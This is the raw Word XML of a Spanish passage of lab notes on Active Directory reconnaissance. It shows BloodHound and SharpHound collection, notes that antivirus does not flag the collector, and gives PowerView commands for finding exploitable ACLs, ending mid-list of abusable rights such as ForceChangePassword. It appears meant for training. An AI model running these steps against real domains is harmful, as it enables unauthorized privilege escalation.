    <w:p w14:paraId="6B0E2E17" w14:textId="4B84515A" w:rsidR="00A61DCD" w:rsidRPr="00A61DCD" w:rsidRDefault="00A61DCD" w:rsidP="00A61DCD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61DCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo apt install bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498589A5" w14:textId="749F067C" w:rsidR="00A61DCD" w:rsidRDefault="00A61DCD" w:rsidP="00A61DCD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Como está basado en una base de datos relacional, necesitamos hacer un setup inicial con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186A3AD4" w14:textId="4AEBB032" w:rsidR="00A61DCD" w:rsidRPr="00A61DCD" w:rsidRDefault="00A61DCD" w:rsidP="00A61DCD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A61DCD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo neo4j console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AB1CA9" w14:textId="5F1CFE87" w:rsidR="0035307B" w:rsidRDefault="0035307B" w:rsidP="00A61DCD">
      <w:r>
        <w:t>Posteriormente abrimos el link que nos suministra la base de datos relacional creada y cambiaremos el usuario y la contraseña. Introducimos la contraseña y el usuario (“neo4j” en ambos casos) y procedemos a cambiarla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B458A4A" w14:textId="528E2BEB" w:rsidR="0035307B" w:rsidRDefault="0035307B" w:rsidP="00A61DCD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Ahora en otra terminal, simplemente podemos poner:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035307B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3C1B9D" w14:textId="2E0E7B70" w:rsidR="0035307B" w:rsidRDefault="0035307B" w:rsidP="0035307B">
      <w:r w:rsidRPr="0035307B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CA24E27" wp14:editId="10099D13">
            <wp:extent cx="5400040" cy="3990975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="8031867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186733" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3990975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10550F0E" w14:textId="4FB154E1" w:rsidR="0035307B" w:rsidRDefault="00F32ECA" w:rsidP="0035307B">
      <w:r>
        <w:t>En nuestro caso, usuario: neo4j y contraseña: Passw0rd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8DCF0E" w14:textId="3DCD7EDE" w:rsidR="00F32ECA" w:rsidRDefault="006106E5" w:rsidP="0035307B">
      <w:r>
        <w:t xml:space="preserve">A continuación, nos vamos al repositorio de GitHub de Bloodhound: </w:t>
      </w:r>
      <w:r w:rsidRPr="006106E5">
        <w:t>github.com/BloodHoundAD/BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2EA990" w14:textId="7C53D5CF" w:rsidR="006106E5" w:rsidRDefault="006106E5" w:rsidP="0035307B">
      <w:r>
        <w:t>En la carpeta Collectors, encontramos un script en powershell (.ps1) que podemos copiar y meter en nuestra máquina Windows 10 WS01.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBAC84E" w14:textId="1623D817" w:rsidR="006106E5" w:rsidRDefault="006106E5" w:rsidP="0035307B">
      <w:r>
        <w:t>A continuación cargamos el script desde powershell con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFBB903" w14:textId="0C6A0F7C" w:rsidR="006106E5" w:rsidRPr="006106E5" w:rsidRDefault="006106E5" w:rsidP="0035307B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006106E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. .\sh.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F3B96A" w14:textId="497FD535" w:rsidR="006106E5" w:rsidRPr="0035307B" w:rsidRDefault="006106E5" w:rsidP="006106E5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006106E5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48233143" wp14:editId="0925BD79">
            <wp:extent cx="2453853" cy="464860"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="7517539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753984" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2453853" cy="464860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2B173C" w14:textId="701F1FE1" w:rsidR="0035307B" w:rsidRPr="000D58A7" w:rsidRDefault="000D58A7" w:rsidP="000D58A7">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D58A7">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>El antivirus está activo y no está detectando absolutamente nada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF2ECFA" w14:textId="77777777" w:rsidR="00A61DCD" w:rsidRPr="00A61DCD" w:rsidRDefault="00A61DCD" w:rsidP="00A61DCD"/>
    <w:p w14:paraId="3B009DFE" w14:textId="13031D8F" w:rsidR="00A61DCD" w:rsidRDefault="000D58A7" w:rsidP="00A61DCD">
      <w:r>
        <w:t>Ahora ya podríamos ejecutar el recopilador de BlodHound desde el WS01 con</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678583C3" w14:textId="4B8F9AFB" w:rsidR="000D58A7" w:rsidRDefault="000D58A7" w:rsidP="000D58A7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D58A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Invoke-BloodHound -Collection All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FD82AC" w14:textId="66A4E5C5" w:rsidR="000D58A7" w:rsidRDefault="000D58A7" w:rsidP="000D58A7">
      <w:r>
        <w:t>Como vemos, al poco, nos genera dos archivos, un bin y un zip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7895D8BA" w14:textId="73C32913" w:rsidR="000D58A7" w:rsidRDefault="000D58A7" w:rsidP="000D58A7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000D58A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="210BBD22" wp14:editId="5A63854F">
            <wp:extent cx="1539373" cy="739204"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="8544577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57792" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1539373" cy="739204"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDACB46" w14:textId="4F05AD97" w:rsidR="000D58A7" w:rsidRDefault="000D58A7" w:rsidP="000D58A7">
      <w:r>
        <w:t>Nos interesa llevarnos el zip a Kali.</w:t>
      </w:r>
      <w:r w:rsidR="00EA27F4">
        <w:t xml:space="preserve"> Y una vez allí, arrastramos el zip hacia la interfaz de BloodHound:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE6BC37" w14:textId="7C03E1C4" w:rsidR="00EA27F4" w:rsidRDefault="00EA27F4" w:rsidP="00EA27F4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA27F4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BF924CC" wp14:editId="6005850B">
            <wp:extent cx="4648603" cy="3635055"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="4806448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644831" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4648603" cy="3635055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="499D8A3B" w14:textId="5B983FC0" w:rsidR="00EA27F4" w:rsidRDefault="009309F6" w:rsidP="00EA27F4">
      <w:r>
        <w:t>Podemos buscar por nodos, podemos buscar el nombre de un objeto y nos devolverá toda la información:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219CC89C" w14:textId="06C5E99B" w:rsidR="009309F6" w:rsidRDefault="009309F6" w:rsidP="009309F6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009309F6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="719F9D7F" wp14:editId="5916DEEC">
            <wp:extent cx="4771470" cy="2781300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7941315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131535" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4836230" cy="2819049"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D31E4FA" w14:textId="0F007179" w:rsidR="009309F6" w:rsidRDefault="009309F6" w:rsidP="009309F6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Una de las mayores virtudes de BloodHound es que es capaz de realizar querys complejas (gracias a la base de datos relacional) y por ello puede hacer análisis preconstruidos como por ejemplo devolvernos los Administradores del Dominio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7294EF6A" w14:textId="545632B1" w:rsidR="009309F6" w:rsidRDefault="009309F6" w:rsidP="009309F6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009309F6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09E393F6" wp14:editId="7AAFE7CE">
            <wp:extent cx="3955123" cy="4945809"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="17230465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046527" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3955123" cy="4945809"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="074418DF" w14:textId="77777777" w:rsidR="009309F6" w:rsidRDefault="009309F6" w:rsidP="009309F6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="073AE2AF" w14:textId="65B3E154" w:rsidR="009309F6" w:rsidRPr="0019417B" w:rsidRDefault="0019417B" w:rsidP="0019417B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019417B">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>En la parte de abajo, nos encontramos una caja de texto llamada Raw Querys. Esta sirve para añadir nuestras propias querys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4233B801" w14:textId="7501B1FA" w:rsidR="0019417B" w:rsidRPr="0019417B" w:rsidRDefault="0019417B" w:rsidP="0019417B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019417B">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D15AF31" wp14:editId="455A3138">
            <wp:extent cx="5400040" cy="1318895"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9133078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307897" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1318895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3133A4CD" w14:textId="46E4D0D6" w:rsidR="0019417B" w:rsidRPr="0019417B" w:rsidRDefault="0019417B" w:rsidP="0019417B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019417B">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Podemos acceder a muchos repositorios de GitHub para conseguir esas querys customizadas. Algunos repositorios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECCBAEF" w14:textId="4363A290" w:rsidR="0019417B" w:rsidRPr="0019417B" w:rsidRDefault="00000000" w:rsidP="0019417B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidR="0019417B" w:rsidRPr="0019417B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:color w:val="0070C0"/>
          </w:rPr>
          <w:t>https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B7F98E5" w14:textId="4EF77504" w:rsidR="0019417B" w:rsidRPr="0019417B" w:rsidRDefault="00000000" w:rsidP="0019417B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="0019417B" w:rsidRPr="0019417B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:color w:val="0070C0"/>
          </w:rPr>
          <w:t>https://github.com/ZephrFish/Bloodhound-CustomQueries/blob/main/customqueries.json</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55B24639" w14:textId="31B1784D" w:rsidR="0019417B" w:rsidRPr="00762B4F" w:rsidRDefault="00762B4F" w:rsidP="0019417B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00762B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explotación de ACLs Vulnerables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231692D5" w14:textId="462FC42E" w:rsidR="00762B4F" w:rsidRDefault="00762B4F" w:rsidP="0019417B">
      <w:r>
        <w:t>Lo primero que hay que conseguir es saber los grupos que queremos comprometer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB0C621" w14:textId="4BF32599" w:rsidR="00762B4F" w:rsidRPr="00762B4F" w:rsidRDefault="00762B4F" w:rsidP="0019417B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00762B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-DomainGroup | select grouptype,name,description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0549DFA3" w14:textId="438EF930" w:rsidR="00762B4F" w:rsidRDefault="00762B4F" w:rsidP="0019417B">
      <w:r>
        <w:t>Lo normal es que nos interese aquellos que sean Administradores de algo. El grupo más importante es Admins. del dominio. Así que podemos buscar las ACLs de ese grupo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FF30B1" w14:textId="455D5259" w:rsidR="00762B4F" w:rsidRPr="00762B4F" w:rsidRDefault="00762B4F" w:rsidP="0019417B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00762B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-DomainObjectAcl -Identity “Admins. del dominio”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A04D088" w14:textId="69AB3F16" w:rsidR="00762B4F" w:rsidRDefault="00762B4F" w:rsidP="0019417B">
      <w:r>
        <w:t>De aquí nos interesa listar el SecurityIdentifier y el AceQualifer. Para saber a qué grupo se está refiriendo en el SecurityIdentifier usamos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4125D856" w14:textId="373E29F6" w:rsidR="00762B4F" w:rsidRPr="00A136C7" w:rsidRDefault="00762B4F" w:rsidP="0019417B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00762B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Convert-SidToName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2292C243" w14:textId="6E44C4C4" w:rsidR="00762B4F" w:rsidRDefault="00762B4F" w:rsidP="0019417B">
      <w:r>
        <w:t>Para obtener las ACLs realmente interesantes de manera casi automática, PowerView usa la opción:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563BE653" w14:textId="3F110303" w:rsidR="00762B4F" w:rsidRDefault="00762B4F" w:rsidP="0019417B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A136C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Invoke-ACLScanner -ResolveGUIDS | select IdentityReferenceName, ObjectDN, ActiveDirectoryRights | f1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E29A408" w14:textId="7D393200" w:rsidR="00A136C7" w:rsidRPr="00762B4F" w:rsidRDefault="00A136C7" w:rsidP="00A136C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00762B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Explotación de ACLs Vulnerables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> en BloodHound</w:t>
      </w:r>
      <w:r w:rsidRPr="00762B4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C0EFA3" w14:textId="6D25D923" w:rsidR="00762B4F" w:rsidRDefault="00A136C7" w:rsidP="0019417B">
      <w:r w:rsidRPr="00A136C7">
        <w:t>Con la opción</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Find Shorter Path </w:t>
      </w:r>
      <w:r>
        <w:t>en la pestaña Analysis, podemos seleccionar la ruta para conseguir privilegios más corta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F16A588" w14:textId="476E247C" w:rsidR="00A136C7" w:rsidRDefault="00A136C7" w:rsidP="0019417B">
      <w:r>
        <w:t>Al calcularlo, podemos inchar sobre un objeto y en el menú lateral, en la parte de abajo del todo, encontraremos los:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638B9E29" w14:textId="083D642E" w:rsidR="00A136C7" w:rsidRDefault="00A136C7" w:rsidP="0019417B">
      <w:r w:rsidRPr="00A136C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>Outbound Control Rights</w:t>
      </w:r>
      <w:r>
        <w:t>: Señalará qué objetos tienen privilegios sobre el objeto seleccionado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437EFE3E" w14:textId="3638E73E" w:rsidR="00A136C7" w:rsidRDefault="00A136C7" w:rsidP="0019417B">
      <w:r w:rsidRPr="00A136C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>Inbound Control Rights:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A136C7">
        <w:rPr>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Señalará qué privilegios tiene el objeto señalado sobre otros objetos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786496B5" w14:textId="71D708C8" w:rsidR="00A136C7" w:rsidRDefault="00A136C7" w:rsidP="0019417B">
      <w:r>
        <w:t>Al ir desplegando desde BloodHound, podemos ver los usuarios que pertenezcan al final de la rama. Esos usuarios serían objetivos de ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1715D335" w14:textId="5AAA3E40" w:rsidR="00A136C7" w:rsidRPr="008B711A" w:rsidRDefault="00A136C7" w:rsidP="008B711A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>A continuación os indico un listado de algunas ACEs que debemos tener en cuenta desde el punto de vista de seguridad de cara a su explotación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B545373" w14:textId="77777777" w:rsidR="00A136C7" w:rsidRPr="008B711A" w:rsidRDefault="00A136C7" w:rsidP="008B711A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ForceChangePassword:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proporciona la capacidad de cambiar la contraseña del usuario objetivo sin conocer el valor actual. Abusado con Set-DomainUserPassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D122949" w14:textId="77777777" w:rsidR="00A136C7" w:rsidRPr="008B711A" w:rsidRDefault="00A136C7" w:rsidP="008B711A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B711A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>AddMembers:</w:t>
